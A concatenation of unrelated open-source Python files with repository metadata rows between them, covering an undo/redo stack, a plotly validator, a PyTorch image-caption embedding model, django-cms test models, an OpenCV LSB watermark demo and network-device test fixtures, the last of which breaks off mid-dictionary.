Sometimes you really don't want the last command. Remove it from the stack
:return: None
:rtype: None
"""
pop_it = self._history.popleft()
popped = pop_it.pop()
if len(pop_it) > 0:
self.history.appendleft(pop_it)
return popped
def clear(self) -> NoReturn:
"""
Remove any commands on the stack and reset the state
"""
self._history = deque(maxlen=self._max_history)
self._future = deque(maxlen=self._max_history)
self._macro_running = False
def undo(self) -> NoReturn:
"""
Undo the last change to the stack
"""
if self.canUndo():
# Move the command from the past to the future
this_command_stack = self._history.popleft()
self._future.appendleft(this_command_stack)
# Execute all undo commands
for command in this_command_stack:
try:
self._command_running = True
command.undo()
except Exception as e:
print(e)
finally:
self._command_running = False
def redo(self) -> NoReturn:
"""
Redo the last `undo` command on the stack
"""
if self.canRedo():
# Move from the future to the past
this_command_stack = self._future.popleft()
self._history.appendleft(this_command_stack)
# Need to go from right to left
this_command_stack = list(this_command_stack)
this_command_stack.reverse()
for command in this_command_stack:
try:
self._command_running = True
command.redo()
except Exception as e:
print(e)
finally:
self._command_running = False
def beginMacro(self, text: str) -> NoReturn:
"""
Start a bulk update i.e. multiple commands under one undo/redo command
"""
if self._macro_running:
raise AssertionError
com = CommandHolder(text)
self.history.appendleft(com)
self._macro_running = True
def endMacro(self) -> NoReturn:
"""
End a bulk update i.e. multiple commands under one undo/redo command
"""
if not self._macro_running:
raise AssertionError
self._macro_running = False
def canUndo(self) -> bool:
"""
Can the last command be undone?
"""
return len(self._history) > 0 and not self._macro_running
def canRedo(self) -> bool:
"""
Can we redo a command?
"""
return len(self._future) > 0 and not self._macro_running
def redoText(self) -> str:
"""
Text associated with a redo item.
"""
text = ''
if self.canRedo():
text = self.future[0].text
return text
def undoText(self) -> str:
"""
Text associated with a undo item.
"""
text = ''
if self.canUndo():
text = self.history[0].text
return text
class PropertyStack(UndoCommand):
"""
Stack operator for when a property setter is wrapped.
"""
def __init__(self, parent, func: Callable, old_value: Any, new_value: Any, text: str = None):
# self.setText("Setting {} to {}".format(func.__name__, new_value))
super().__init__(self)
self._parent = parent
self._old_value = old_value
self._new_value = new_value
self._set_func = func
self.text = f'{parent} value changed from {old_value} to {new_value}'
if text is not None:
self.text = text
def undo(self) -> NoReturn:
self._set_func(self._parent, self._old_value)
def redo(self) -> NoReturn:
self._set_func(self._parent, self._new_value)
class FunctionStack(UndoCommand):
def __init__(self, parent, set_func: Callable, unset_func: Callable, text: str = None):
super().__init__(self)
self._parent = parent
self._old_fn = set_func
self._new_fn = unset_func
self.text = f'{parent} called {set_func}'
if text is not None:
self.text = text
def undo(self):
self._new_fn()
def redo(self):
self._old_fn()
class DictStack(UndoCommand):
def __init__(self, in_dict: NotarizedDict, *args):
super().__init__(self)
self._parent = in_dict
self._deletion = False
self._creation = False
self._key = None
self._index = None
self._old_value = None
self._new_value = None
self.text = ''
if len(args) == 1:
# We are deleting
self._deletion = True
self._index = list(self._parent.keys()).index(args[0])
self._old_value = self._parent[args[0]]
self._key = args[0]
self.text = f'Deleting {args[0]} from {self._parent}'
elif len(args) == 2:
# We are either creating or setting
self._key = args[0]
self._new_value = args[1]
if self._key in self._parent.keys():
# We are modifying
self._old_value = self._parent[self._key]
self.text = f'Setting {self._parent}[{self._key}] from {self._old_value} to {self._new_value}'
else:
self._creation = True
self.text = f'Creating {self._parent}[{self._key}] with value {self._new_value}'
else:
raise ValueError
def undo(self) -> NoReturn:
if self._creation:
# Now we delete
self._parent.data.__delitem__(self._key)
else:
# Now we create/change value
if self._index is None:
self._parent.data.__setitem__(self._key, self._old_value)
else:
# This deals with placing an item in a place
keys = list(self._parent.keys())
values = list(self._parent.values())
keys.insert(self._index, self._key)
values.insert(self._index, self._old_value)
self._parent.reorder(**{k: v for k, v in zip(keys, values)})
def redo(self) -> NoReturn:
if self._deletion:
# Now we delete
self._parent.data.__delitem__(self._key)
else:
self._parent.data.__setitem__(self._key, self._new_value)
class DictStackReCreate(UndoCommand):
def __init__(self, in_dict: NotarizedDict, **kwargs):
super().__init__(self)
self._parent = in_dict
self._old_value = in_dict.data.copy()
self._new_value = kwargs
self.text = 'Updating dictionary'
def undo(self) -> NoReturn:
self._parent.data = self._old_value
def redo(self) -> NoReturn:
self._parent.data = self._new_value
def property_stack_deco(arg: Union[str, Callable], begin_macro=False) -> Callable:
"""
Decorate a `property` setter with undo/redo functionality
This decorator can be used as:
@property_stack_deco
def func()
....
or
@property_stack_deco("This is the undo/redo text)
def func()
....
In the latter case the argument is a string which might be evaluated.
The possible markups for this string are;
`obj` - The thing being operated on
`func` - The function being called
`name` - The name of the function being called.
`old_value` - The pre-set value
`new_value` - The post-set value
An example would be `Function {name}: Set from {old_value} to {new_value}`
"""
if isinstance(arg, Callable):
func = arg
name = func.__name__
def wrapper(obj, *args) -> NoReturn:
old_value = getattr(obj, name)
new_value = args[0]
if new_value == old_value:
return
if borg.debug:
print(f"I'm {obj} and have been set from {old_value} to {new_value}!")
borg.stack.push(PropertyStack(obj, func, old_value, new_value))
setattr(wrapper, 'func', func)
else:
txt = arg
def wrapper(func: Callable) -> Callable:
name = func.__name__
def inner_wrapper(obj, *args) -> NoReturn:
if begin_macro:
borg.stack.beginMacro(txt)
old_value = getattr(obj, name)
new_value = args[0]
if new_value == old_value:
return
if borg.debug:
print(f"I'm {obj} and have been set from {old_value} to {new_value}!")
borg.stack.push(PropertyStack(obj, func, old_value, new_value, text=txt.format(**locals())))
setattr(inner_wrapper, 'func', func)
return inner_wrapper
return wrapper
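# Illustrative usage sketch (added commentary, not part of the original
# module). Assuming `borg.stack` follows Qt-style semantics where `push()`
# immediately executes the pushed command, a decorated setter records every
# value change as an undoable command. The `Knob` class here is hypothetical:
#
#     class Knob:
#         def __init__(self):
#             self._value = 0
#         @property
#         def value(self):
#             return self._value
#         @value.setter
#         @property_stack_deco('Set {name} from {old_value} to {new_value}')
#         def value(self, new_value):
#             self._value = new_value
#
#     k = Knob()
#     k.value = 5        # pushes a PropertyStack command onto borg.stack
#     borg.stack.undo()  # reverts k.value to 0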
| 28.789474 | 110 | 0.576501 |
4a20f8880306bd41f14954d77c8f6c384e391867 | 428 | py | Python | plotly/validators/surface/colorbar/_len.py | faezs/plotly.py | 6009b5b9c746e5d2a2849ad255a4eb234b551ed7 | ["MIT"] | 2 | 2020-03-24T11:41:14.000Z | 2021-01-14T07:59:43.000Z | plotly/validators/surface/colorbar/_len.py | faezs/plotly.py | 6009b5b9c746e5d2a2849ad255a4eb234b551ed7 | ["MIT"] | null | null | null | plotly/validators/surface/colorbar/_len.py | faezs/plotly.py | 6009b5b9c746e5d2a2849ad255a4eb234b551ed7 | ["MIT"] | 4 | 2019-06-03T14:49:12.000Z | 2022-01-06T01:05:12.000Z |
import _plotly_utils.basevalidators
class LenValidator(_plotly_utils.basevalidators.NumberValidator):
def __init__(
self, plotly_name='len', parent_name='surface.colorbar', **kwargs
):
super(LenValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type='calc',
min=0,
role='style',
**kwargs
)
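# Illustrative note (added commentary, not part of the generated file): plotly
# instantiates validators like this one internally when checking figure
# properties. Assuming the `validate_coerce` API inherited from
# `NumberValidator`, standalone use would look like:
#
#     v = LenValidator()
#     v.validate_coerce(0.5)  # accepted: a number within min=0
#     v.validate_coerce(-1)   # rejected: below the min=0 constraint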
| 25.176471 | 73 | 0.602804 |
4a20f89d24e4b13809d0a48b743a220ef5fbb78f | 733 | py | Python | martypy/RateAverager.py | robotical/martypy | afc1f89d471875ca1beb775f375438f97fc33679 | ["Apache-2.0"] | 8 | 2017-08-02T11:31:50.000Z | 2022-01-05T14:36:53.000Z | martypy/RateAverager.py | robotical/martypy | afc1f89d471875ca1beb775f375438f97fc33679 | ["Apache-2.0"] | 17 | 2017-07-24T22:39:43.000Z | 2022-01-05T14:41:20.000Z | martypy/RateAverager.py | robotical/martypy | afc1f89d471875ca1beb775f375438f97fc33679 | ["Apache-2.0"] | 5 | 2017-11-12T08:51:18.000Z | 2020-11-27T09:28:46.000Z |
import time
class RateAverager:
    """Track a windowed average rate (in samples per second) and a running total."""
def __init__(self, windowSizeMinSecs = 1):
self.sampleCount = 0
self.windowSizeMinSecs = windowSizeMinSecs
self.lastCalcSecs = time.time()
self.prevVal = 0
self.totalCount = 0
def addSample(self):
self.sampleCount += 1
self.totalCount += 1
def getAvg(self):
if self.lastCalcSecs + self.windowSizeMinSecs < time.time():
rsltVal = self.sampleCount / (time.time() - self.lastCalcSecs)
self.lastCalcSecs = time.time()
self.sampleCount = 0
self.prevVal = rsltVal
return rsltVal
return self.prevVal
def getTotal(self):
return self.totalCount
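if __name__ == '__main__':
    # Minimal demonstration (added for illustration; not part of the original
    # module): emit samples for ~2 seconds and report the windowed rate.
    averager = RateAverager(windowSizeMinSecs=1)
    start = time.time()
    while time.time() - start < 2:
        averager.addSample()
        time.sleep(0.01)  # roughly 100 samples per second
    print('rate: %.1f samples/s, total: %d' % (averager.getAvg(), averager.getTotal()))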
| 27.148148 | 74 | 0.601637 |
4a20f8afebe770c046b6775f0028d75dba283c48 | 12,990 | py | Python | model.py | Straffern/vsepp | abd87733f7081ae864c29ca5c09809cf2ee316bb | ["Apache-2.0"] | null | null | null | model.py | Straffern/vsepp | abd87733f7081ae864c29ca5c09809cf2ee316bb | ["Apache-2.0"] | null | null | null | model.py | Straffern/vsepp | abd87733f7081ae864c29ca5c09809cf2ee316bb | ["Apache-2.0"] | null | null | null |
import torch
import torch.nn as nn
import torch.nn.init
import torchvision.models as models
from torch.autograd import Variable
from torch.nn.utils.rnn import pack_padded_sequence, pad_packed_sequence
import torch.backends.cudnn as cudnn
from torch.nn.utils.clip_grad import clip_grad_norm
import numpy as np
from collections import OrderedDict
def l2norm(X):
"""L2-normalize columns of X
"""
norm = torch.pow(X, 2).sum(dim=1, keepdim=True).sqrt()
X = torch.div(X, norm)
return X
def EncoderImage(data_name, img_dim, embed_size, finetune=False,
cnn_type='vgg19', use_abs=False, no_imgnorm=False):
"""A wrapper to image encoders. Chooses between an encoder that uses
precomputed image features, `EncoderImagePrecomp`, or an encoder that
computes image features on the fly `EncoderImageFull`.
"""
if data_name.endswith('_precomp'):
img_enc = EncoderImagePrecomp(
img_dim, embed_size, use_abs, no_imgnorm)
else:
img_enc = EncoderImageFull(
embed_size, finetune, cnn_type, use_abs, no_imgnorm)
return img_enc
# tutorials/09 - Image Captioning
class EncoderImageFull(nn.Module):
def __init__(self, embed_size, finetune=False, cnn_type='vgg19',
use_abs=False, no_imgnorm=False):
"""Load pretrained VGG19 and replace top fc layer."""
super(EncoderImageFull, self).__init__()
self.embed_size = embed_size
self.no_imgnorm = no_imgnorm
self.use_abs = use_abs
# Load a pre-trained model
self.cnn = self.get_cnn(cnn_type, True)
# For efficient memory usage.
for param in self.cnn.parameters():
param.requires_grad = finetune
# Replace the last fully connected layer of CNN with a new one
if cnn_type.startswith('vgg'):
self.fc = nn.Linear(self.cnn.classifier._modules['6'].in_features,
embed_size)
self.cnn.classifier = nn.Sequential(
*list(self.cnn.classifier.children())[:-1])
elif cnn_type.startswith('resnet'):
self.fc = nn.Linear(self.cnn.module.fc.in_features, embed_size)
self.cnn.module.fc = nn.Sequential()
self.init_weights()
def get_cnn(self, arch, pretrained):
"""Load a pretrained CNN and parallelize over GPUs
"""
if pretrained:
print("=> using pre-trained model '{}'".format(arch))
model = models.__dict__[arch](pretrained=True)
else:
print("=> creating model '{}'".format(arch))
model = models.__dict__[arch]()
if arch.startswith('alexnet') or arch.startswith('vgg'):
model.features = nn.DataParallel(model.features)
model.cuda()
else:
model = nn.DataParallel(model).cuda()
return model
def load_state_dict(self, state_dict):
"""
Handle the models saved before commit pytorch/vision@989d52a
"""
if 'cnn.classifier.1.weight' in state_dict:
state_dict['cnn.classifier.0.weight'] = state_dict[
'cnn.classifier.1.weight']
del state_dict['cnn.classifier.1.weight']
state_dict['cnn.classifier.0.bias'] = state_dict[
'cnn.classifier.1.bias']
del state_dict['cnn.classifier.1.bias']
state_dict['cnn.classifier.3.weight'] = state_dict[
'cnn.classifier.4.weight']
del state_dict['cnn.classifier.4.weight']
state_dict['cnn.classifier.3.bias'] = state_dict[
'cnn.classifier.4.bias']
del state_dict['cnn.classifier.4.bias']
super(EncoderImageFull, self).load_state_dict(state_dict)
def init_weights(self):
"""Xavier initialization for the fully connected layer
"""
r = np.sqrt(6.) / np.sqrt(self.fc.in_features +
self.fc.out_features)
self.fc.weight.data.uniform_(-r, r)
self.fc.bias.data.fill_(0)
def forward(self, images):
"""Extract image feature vectors."""
features = self.cnn(images)
# normalization in the image embedding space
features = l2norm(features)
# linear projection to the joint embedding space
features = self.fc(features)
# normalization in the joint embedding space
if not self.no_imgnorm:
features = l2norm(features)
# take the absolute value of the embedding (used in order embeddings)
if self.use_abs:
features = torch.abs(features)
return features
class EncoderImagePrecomp(nn.Module):
def __init__(self, img_dim, embed_size, use_abs=False, no_imgnorm=False):
super(EncoderImagePrecomp, self).__init__()
self.embed_size = embed_size
self.no_imgnorm = no_imgnorm
self.use_abs = use_abs
self.fc = nn.Linear(img_dim, embed_size)
self.init_weights()
def init_weights(self):
"""Xavier initialization for the fully connected layer
"""
r = np.sqrt(6.) / np.sqrt(self.fc.in_features +
self.fc.out_features)
self.fc.weight.data.uniform_(-r, r)
self.fc.bias.data.fill_(0)
def forward(self, images):
"""Extract image feature vectors."""
# assuming that the precomputed features are already l2-normalized
features = self.fc(images)
# normalize in the joint embedding space
if not self.no_imgnorm:
features = l2norm(features)
# take the absolute value of embedding (used in order embeddings)
if self.use_abs:
features = torch.abs(features)
return features
def load_state_dict(self, state_dict):
"""Copies parameters. overwritting the default one to
accept state_dict from Full model
"""
own_state = self.state_dict()
new_state = OrderedDict()
for name, param in state_dict.items():
if name in own_state:
new_state[name] = param
super(EncoderImagePrecomp, self).load_state_dict(new_state)
# tutorials/08 - Language Model
# RNN Based Language Model
class EncoderText(nn.Module):
def __init__(self, vocab_size, word_dim, embed_size, num_layers,
use_abs=False):
super(EncoderText, self).__init__()
self.use_abs = use_abs
self.embed_size = embed_size
# word embedding
self.embed = nn.Embedding(vocab_size, word_dim)
# caption embedding
self.rnn = nn.GRU(word_dim, embed_size, num_layers, batch_first=True)
self.init_weights()
def init_weights(self):
self.embed.weight.data.uniform_(-0.1, 0.1)
def forward(self, x, lengths):
"""Handles variable size captions
"""
# Embed word ids to vectors
x = self.embed(x)
packed = pack_padded_sequence(x, lengths, batch_first=True)
# Forward propagate RNN
out, _ = self.rnn(packed)
# Reshape *final* output to (batch_size, hidden_size)
padded = pad_packed_sequence(out, batch_first=True)
I = torch.LongTensor(lengths).view(-1, 1, 1)
if torch.cuda.is_available():
I = Variable(I.expand(x.size(0), 1, self.embed_size)-1).cuda()
else:
I = Variable(I.expand(x.size(0), 1, self.embed_size)-1)
out = torch.gather(padded[0], 1, I).squeeze(1)
# normalization in the joint embedding space
out = l2norm(out)
# take absolute value, used by order embeddings
if self.use_abs:
out = torch.abs(out)
return out
def cosine_sim(im, s):
"""Cosine similarity between all the image and sentence pairs
"""
return im.mm(s.t())
def order_sim(im, s):
"""Order embeddings similarity measure $max(0, s-im)$
"""
YmX = (s.unsqueeze(1).expand(s.size(0), im.size(0), s.size(1))
- im.unsqueeze(0).expand(s.size(0), im.size(0), s.size(1)))
score = -YmX.clamp(min=0).pow(2).sum(2).sqrt().t()
return score
class ContrastiveLoss(nn.Module):
"""
Compute contrastive loss
"""
def __init__(self, margin=0, measure=False, max_violation=False):
super(ContrastiveLoss, self).__init__()
self.margin = margin
if measure == 'order':
self.sim = order_sim
else:
self.sim = cosine_sim
self.max_violation = max_violation
def forward(self, im, s):
# compute image-sentence score matrix
scores = self.sim(im, s)
diagonal = scores.diag().view(im.size(0), 1)
d1 = diagonal.expand_as(scores)
d2 = diagonal.t().expand_as(scores)
# compare every diagonal score to scores in its column
# caption retrieval
cost_s = (self.margin + scores - d1).clamp(min=0)
# compare every diagonal score to scores in its row
# image retrieval
cost_im = (self.margin + scores - d2).clamp(min=0)
# clear diagonals
mask = torch.eye(scores.size(0)) > .5
I = Variable(mask)
if torch.cuda.is_available():
I = I.cuda()
cost_s = cost_s.masked_fill_(I, 0)
cost_im = cost_im.masked_fill_(I, 0)
# keep the maximum violating negative for each query
if self.max_violation:
cost_s = cost_s.max(1)[0]
cost_im = cost_im.max(0)[0]
return cost_s.sum() + cost_im.sum()
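# Illustrative shape note (added commentary, not part of the original file):
# with a batch of N matched image/caption embeddings of dimension D,
#
#     im = l2norm(torch.randn(8, 1024))
#     s = l2norm(torch.randn(8, 1024))
#     loss = ContrastiveLoss(margin=0.2, max_violation=True)(im, s)
#
# the internal `scores` is the 8x8 similarity matrix whose diagonal holds the
# positive pairs; all off-diagonal entries act as in-batch negatives.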
class VSE(object):
"""
rkiros/uvs model
"""
def __init__(self, opt):
# tutorials/09 - Image Captioning
# Build Models
self.grad_clip = opt.grad_clip
self.img_enc = EncoderImage(opt.data_name, opt.img_dim, opt.embed_size,
opt.finetune, opt.cnn_type,
use_abs=opt.use_abs,
no_imgnorm=opt.no_imgnorm)
self.txt_enc = EncoderText(opt.vocab_size, opt.word_dim,
opt.embed_size, opt.num_layers,
use_abs=opt.use_abs)
if torch.cuda.is_available():
self.img_enc.cuda()
self.txt_enc.cuda()
cudnn.benchmark = True
# Loss and Optimizer
self.criterion = ContrastiveLoss(margin=opt.margin,
measure=opt.measure,
max_violation=opt.max_violation)
params = list(self.txt_enc.parameters())
params += list(self.img_enc.fc.parameters())
if opt.finetune:
params += list(self.img_enc.cnn.parameters())
self.params = params
self.optimizer = torch.optim.Adam(params, lr=opt.learning_rate)
self.Eiters = 0
def state_dict(self):
state_dict = [self.img_enc.state_dict(), self.txt_enc.state_dict()]
return state_dict
def load_state_dict(self, state_dict):
self.img_enc.load_state_dict(state_dict[0])
self.txt_enc.load_state_dict(state_dict[1])
def train_start(self):
"""switch to train mode
"""
self.img_enc.train()
self.txt_enc.train()
def val_start(self):
"""switch to evaluate mode
"""
self.img_enc.eval()
self.txt_enc.eval()
def forward_emb(self, images, captions, lengths, volatile=False):
"""Compute the image and caption embeddings
"""
# Set mini-batch dataset
images = Variable(images, volatile=volatile)
captions = Variable(captions, volatile=volatile)
if torch.cuda.is_available():
images = images.cuda()
captions = captions.cuda()
# Forward
img_emb = self.img_enc(images)
cap_emb = self.txt_enc(captions, lengths)
return img_emb, cap_emb
def forward_loss(self, img_emb, cap_emb, **kwargs):
"""Compute the loss given pairs of image and caption embeddings
"""
loss = self.criterion(img_emb, cap_emb)
# self.logger.update('Le', loss.data[0], img_emb.size(0))
self.logger.update('Le', loss.item(), img_emb.size(0))
return loss
def train_emb(self, images, captions, lengths, ids=None, *args):
"""One training step given images and captions.
"""
self.Eiters += 1
self.logger.update('Eit', self.Eiters)
self.logger.update('lr', self.optimizer.param_groups[0]['lr'])
# compute the embeddings
img_emb, cap_emb = self.forward_emb(images, captions, lengths)
# measure accuracy and record loss
self.optimizer.zero_grad()
loss = self.forward_loss(img_emb, cap_emb)
# compute gradient and do SGD step
loss.backward()
if self.grad_clip > 0:
            clip_grad_norm_(self.params, self.grad_clip)
self.optimizer.step()
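# Illustrative driver sketch (added commentary, not part of the original
# file). Given an `opt` namespace carrying the hyperparameters referenced in
# `VSE.__init__` and a data loader yielding (images, captions, lengths, ids)
# batches, one epoch of training reduces to:
#
#     model = VSE(opt)
#     model.logger = some_meter  # train_emb expects a logger with .update()
#     model.train_start()
#     for images, captions, lengths, ids in train_loader:
#         model.train_emb(images, captions, lengths, ids)
#
# `some_meter` and `train_loader` are placeholders for objects supplied by
# the caller.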
| 33.307692 | 79 | 0.603849 |
4a20f9e020e57ef3dc9d876e29e43a5d0de5faf1 | 2,425 | py | Python | duden/common.py | Scriptim/duden | 0d0c0dbb0b6d33f8fb269a8bde50a227e3fe44da | ["MIT"] | null | null | null | duden/common.py | Scriptim/duden | 0d0c0dbb0b6d33f8fb269a8bde50a227e3fe44da | ["MIT"] | null | null | null | duden/common.py | Scriptim/duden | 0d0c0dbb0b6d33f8fb269a8bde50a227e3fe44da | ["MIT"] | null | null | null |
# -*- coding: utf-8 -*-
from string import ascii_lowercase
def recursively_extract(node, exfun, maxdepth=2):
"""
Transform a html ul/ol tree into a python list tree.
Converts a html node containing ordered and unordered lists and list items
into an object of lists with tree-like structure. Leaves are retrieved by
applying `exfun` function to the html nodes not containing any ul/ol list.
Args:
node: BeautifulSoup HTML node to traverse
exfun: function to apply to every string node found
maxdepth: maximal depth of lists to go in the node
Returns:
A tree-like python object composed of lists.
Examples:
>>> node_content = \
'''
<ol>
<li>Hase</li>
<li>Nase<ol><li>Eins</li><li>Zwei</li></ol></li>
</ol>'''
        >>> from bs4 import BeautifulSoup
        >>> node = BeautifulSoup(node_content, "lxml")
>>> recursively_extract(node, lambda x: x)
[<li>Hase</li>, [<li>Eins</li>, <li>Zwei</li>]]
>>> recursively_extract(node, lambda x: x.get_text())
['Hase', ['Eins', 'Zwei']]
"""
if node.name in ['ol', 'ul']:
lilist = node
else:
lilist = node.ol or node.ul
if lilist and maxdepth:
# apply 'recursively_extract' to every 'li' node found under this node
return [recursively_extract(li, exfun, maxdepth=(maxdepth - 1))
for li in lilist.find_all('li', recursive=False)]
# if this node doesn't contain 'ol' or 'ul' node, return the transformed
# leaf (using the 'exfun' function)
return exfun(node)
def print_tree_of_strings(tree):
"""
Print a tree of strings up to depth 2
Args:
tree: tree of strings
Example:
>>> print_tree_of_strings(['Hase', ['Eins', 'Zwei']])
0. Hase
<BLANKLINE>
1. a. Eins
b. Zwei
"""
if isinstance(tree, str):
print(tree)
return
for i1, m1 in enumerate(tree):
if type(m1) is str:
print("{:>2}. {}".format(i1, m1))
elif type(m1) is list:
for i2, m2 in zip(ascii_lowercase, m1):
indent = "{:>2}. ".format(i1) if i2 == 'a' else " " * 4
print("{} {}. {}".format(indent, i2, m2))
print()
def print_string_or_list(obj):
    """Print a string directly, or each element of a list on its own line."""
if isinstance(obj, list):
for elem in obj:
print(elem)
else:
print(obj)
def clear_text(text):
    """Strip soft hyphens (U+00AD) and surrounding whitespace from text."""
return text.replace('\xad', '').strip()
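if __name__ == '__main__':
    # Added for convenience (not part of the original module): exercise the
    # doctests embedded in the docstrings above.
    import doctest
    doctest.testmod()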
| 27.556818 | 78 | 0.583093 |
4a20fa5c08946ca8269c7a4066919dffa8e0e847 | 1,288 | py | Python | cms/test_utils/project/sampleapp/models.py | Mario-Kart-Felix/django-cms | 6d68439fe7fd59d000f99e27c1f2135a3f9c816a | ["BSD-3-Clause"] | 5,659 | 2015-01-01T02:42:30.000Z | 2020-10-07T02:38:29.000Z | cms/test_utils/project/sampleapp/models.py | rpep/django-cms | 53dddb106f45963f9f8393d434b4313fa3bbdf54 | ["BSD-3-Clause"] | 3,264 | 2015-01-02T10:11:48.000Z | 2020-10-08T13:15:07.000Z | cms/test_utils/project/sampleapp/models.py | rpep/django-cms | 53dddb106f45963f9f8393d434b4313fa3bbdf54 | ["BSD-3-Clause"] | 2,132 | 2015-01-01T11:28:21.000Z | 2020-10-06T09:09:11.000Z |
from django.db import models
from django.urls import reverse
from treebeard.mp_tree import MP_Node
from cms.models.fields import PageField, PlaceholderField
class Category(MP_Node):
parent = models.ForeignKey('self', blank=True, null=True, on_delete=models.CASCADE)
name = models.CharField(max_length=20)
description = PlaceholderField('category_description', 600)
def __str__(self):
return self.name
def get_absolute_url(self):
return reverse('category_view', args=[self.pk])
class Meta:
verbose_name_plural = 'categories'
class Picture(models.Model):
image = models.ImageField(upload_to="pictures")
category = models.ForeignKey(Category, on_delete=models.CASCADE)
class SampleAppConfig(models.Model):
namespace = models.CharField(
default=None,
max_length=100,
unique=True,
)
class PageOnDeleteCascade(models.Model):
page = PageField(null=True)
class PageOnDeleteSetNull(models.Model):
page = PageField(on_delete=models.SET_NULL, null=True)
class PlaceholderOnDeleteCascade(models.Model):
placeholder = PlaceholderField('body', null=True)
class PlaceholderOnDeleteSetNull(models.Model):
placeholder = PlaceholderField('body', on_delete=models.SET_NULL, null=True)
| 25.76 | 87 | 0.736801 |
4a20fcd8e539deca23af8f30e45f3c12de8e2b73 | 795 | py | Python | opencv_learn/charpter03/demo_13.15.py | zhangxinzhou/play_game | 854448f8416b2d3f98bb2c3ed0f7d834a61593de | ["Apache-2.0"] | null | null | null | opencv_learn/charpter03/demo_13.15.py | zhangxinzhou/play_game | 854448f8416b2d3f98bb2c3ed0f7d834a61593de | ["Apache-2.0"] | null | null | null | opencv_learn/charpter03/demo_13.15.py | zhangxinzhou/play_game | 854448f8416b2d3f98bb2c3ed0f7d834a61593de | ["Apache-2.0"] | null | null | null |
import cv2
import numpy as np
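# Added commentary (not in the original script): this demo embeds a binary
# watermark in the least-significant-bit (LSB) plane of a grayscale carrier.
# ANDing with 254 (binary 1111_1110) clears the LSB, ORing with the 0/1
# watermark writes it, and ANDing with 1 reads it back out.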
# 读取原始图像
lena = cv2.imread(r"..\lena.jpg", 0)
# 读取水印
watermark = cv2.imread(r"..\watermark.bmp", 0)
# 将水印图像内的值255处理为1,以方便嵌入
w = watermark[:, :] > 0
watermark[w] = 1
# 读取原始载体图像的shape值
r, c = lena.shape
# ===========嵌入过程=============
# 生产元素值都是254的数组
t254 = np.ones((r, c), dtype=np.uint8) * 254
# 获取lena图像的高7位
lenaH7 = cv2.bitwise_and(lena, t254)
# 将watermark嵌入lenaH7内
e = cv2.bitwise_or(lenaH7, watermark)
# ===========提取过程=============
# 生成元素都是1的数组
t1 = np.ones((r, c), dtype=np.uint8)
# 从载体图像内提取水印图像
wm = cv2.bitwise_and(e, t1)
print(wm)
# 将水印图像内的1处理为255,以方便显示
w = wm[:, :] > 0
wm[w] = 255
# ===========显示=============
cv2.imshow("lena", lena)
cv2.imshow("watermark", watermark * 255)
cv2.imshow("e", e)
cv2.imshow("wm", wm)
cv2.waitKey()
cv2.destroyAllWindows()
| 22.083333 | 46 | 0.621384 |
4a20fd016a53fae0b0eb8ab29795a188a0723802 | 702 | py | Python | tests/test_fsspec_compat.py | mhaberler/xpublish | 38228d0399d97dae591d4c1fa2a7664a2e2a89c6 | ["MIT"] | null | null | null | tests/test_fsspec_compat.py | mhaberler/xpublish | 38228d0399d97dae591d4c1fa2a7664a2e2a89c6 | ["MIT"] | 29 | 2020-09-24T05:59:43.000Z | 2022-03-31T01:04:22.000Z | tests/test_fsspec_compat.py | benbovy/xpublish | 563b0b7b02aace1e9ea5aa299a90a15873692a78 | ["MIT"] | null | null | null |
import json
import pytest
import xarray as xr
from xpublish import Rest
from xpublish.utils.zarr import create_zmetadata, jsonify_zmetadata
from .utils import TestMapper
@pytest.fixture(scope='module')
def airtemp_ds():
ds = xr.tutorial.open_dataset('air_temperature')
return ds
def test_get_zmetadata_key(airtemp_ds):
mapper = TestMapper(Rest(airtemp_ds).app)
actual = json.loads(mapper['.zmetadata'].decode())
expected = jsonify_zmetadata(airtemp_ds, create_zmetadata(airtemp_ds))
assert actual == expected
def test_missing_key_raises_keyerror(airtemp_ds):
mapper = TestMapper(Rest(airtemp_ds).app)
with pytest.raises(KeyError):
_ = mapper['notakey']
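# Added note (not part of the original test module): these tests exercise the
# fsspec-style mapper interface against xpublish's zarr endpoints; run them
# with pytest, e.g. `pytest tests/test_fsspec_compat.py`. The first use of the
# fixture downloads the `air_temperature` tutorial dataset, so network access
# is required on a cold cache.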
| 24.206897 | 74 | 0.754986 |
4a20fdc77aa3edd0dae77b67e1c753ae421883ec | 3,152 | py | Python | pkgs/ops-pkg/src/genie/libs/ops/nd/iosxe/tests/nd_output.py | jbronikowski/genielibs | 200a34e5fe4838a27b5a80d5973651b2e34ccafb | ["Apache-2.0"] | 94 | 2018-04-30T20:29:15.000Z | 2022-03-29T13:40:31.000Z | pkgs/ops-pkg/src/genie/libs/ops/nd/iosxe/tests/nd_output.py | jbronikowski/genielibs | 200a34e5fe4838a27b5a80d5973651b2e34ccafb | ["Apache-2.0"] | 67 | 2018-12-06T21:08:09.000Z | 2022-03-29T18:00:46.000Z | pkgs/ops-pkg/src/genie/libs/ops/nd/iosxe/tests/nd_output.py | jbronikowski/genielibs | 200a34e5fe4838a27b5a80d5973651b2e34ccafb | ["Apache-2.0"] | 49 | 2018-06-29T18:59:03.000Z | 2022-03-10T02:07:59.000Z |
'''
Nd Genie Ops Object Outputs for IOSXE.
'''
class NdOutput(object):
ShowIpv6Neighbors = {
"interface": {
"GigabitEthernet2.90": {
"interface": "GigabitEthernet2.90",
"neighbors": {
"FE80::F816:3EFF:FE0F:B2EC": {
"age": "2",
"ip": "FE80::F816:3EFF:FE0F:B2EC",
"link_layer_address": "fa16.3e0f.b2ec",
"neighbor_state": "STALE"
}
}
}
}
}
ShowIpv6Interface = {
"GigabitEthernet2.90": {
"enabled": True,
"oper_status": "up",
"ipv6": {
"FE80::F816:3EFF:FE26:1224": {
"ip": "FE80::F816:3EFF:FE26:1224",
"origin": "link_layer",
"status": "valid"
},
"2001:10:12:90::1/64": {
"ip": "2001:10:12:90::1",
"prefix_length": "64",
"status": "valid"
},
"enabled": True,
"icmp": {
"error_messages_limited": 100,
"redirects": True,
"unreachables": "sent"
},
"nd": {
"suppress": False,
"dad_enabled": True,
"dad_attempts": 1,
"reachable_time": 30000,
"using_time": 30000,
"advertised_reachable_time": 0,
"advertised_reachable_time_unspecified": True,
"advertised_retransmit_interval": 0,
"advertised_retransmit_interval_unspecified": True,
"router_advertisements_interval": 200,
"router_advertisements_live": 1800,
"advertised_default_router_preference": "Medium"
}
},
"joined_group_addresses": [
"FF02::1",
"FF02::16",
"FF02::1:FF00:1",
"FF02::1:FF26:1224",
"FF02::2",
"FF02::A",
"FF02::D"
],
"mtu": 1500,
"addresses_config_method": "stateless autoconfig"
}
}
ndOpsOutput = {
'interface':{
